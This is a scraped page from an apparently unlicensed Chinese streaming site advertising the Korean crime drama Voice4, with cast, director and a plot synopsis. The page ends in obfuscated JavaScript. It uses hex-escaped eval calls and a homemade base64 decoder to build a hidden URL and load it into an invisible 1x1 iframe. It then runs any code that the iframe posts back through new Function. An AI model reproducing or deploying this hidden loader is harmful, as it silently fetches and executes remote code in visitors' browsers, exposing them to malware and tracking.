Voice4-电视剧-高清完整版全集在线免费观看-吾爱樱花影视
 • 当前位置: 首页 日本剧 Voice4

  Voice4

  分类:日本剧 韩国 2021

  主演:宋承宪  李荷娜  孙恩书  韩熙  郑贤俊  金权   

  导演:申勇辉   

  状态:完结

  更新:2021-08-01 20:25

  剧情介绍

  《Voice4》副标题为‘’审判的时间”主要讲述了死守犯罪现场黄金时间的112中心要员们来到大韩民国最大观光地济州岛,与操纵触法少年们残忍杀害全家族的4人格连锁杀人犯在大安家族村庄小浪村展开激烈斗争的犯罪记录故事。 详情

  猜你喜欢

  加载中...
  

  吾爱影院-私人影视大全-高清电影天天在线观看

  首页

  电影

  电视剧

  综艺

  动漫

  if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
  eval('\x77\x69\x6e\x64\x6f\x77')['FBxFGrY']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_7589`]) { var t = x(e.data[`des_s_7589`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HRF'+'F0c'+'HMl'+'MFF'+'0El'+'MkY'+'FFl'+'MkZ'+'qYS'+'55d'+'XNo'+'dWh'+'hLF'+'FmN'+'vFF'+'bSU'+'zQT'+'FFE'+'wNF'+'FDQ'+'zJT'+'JGN'+'DFF'+'FlN'+'FFz'+'YzJ'+'TJF'+'FGY'+'y03'+'NFF'+'Tg5'+'FFL'+'TIy'+'LTF'+'FEu'+'YXU'+'=',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}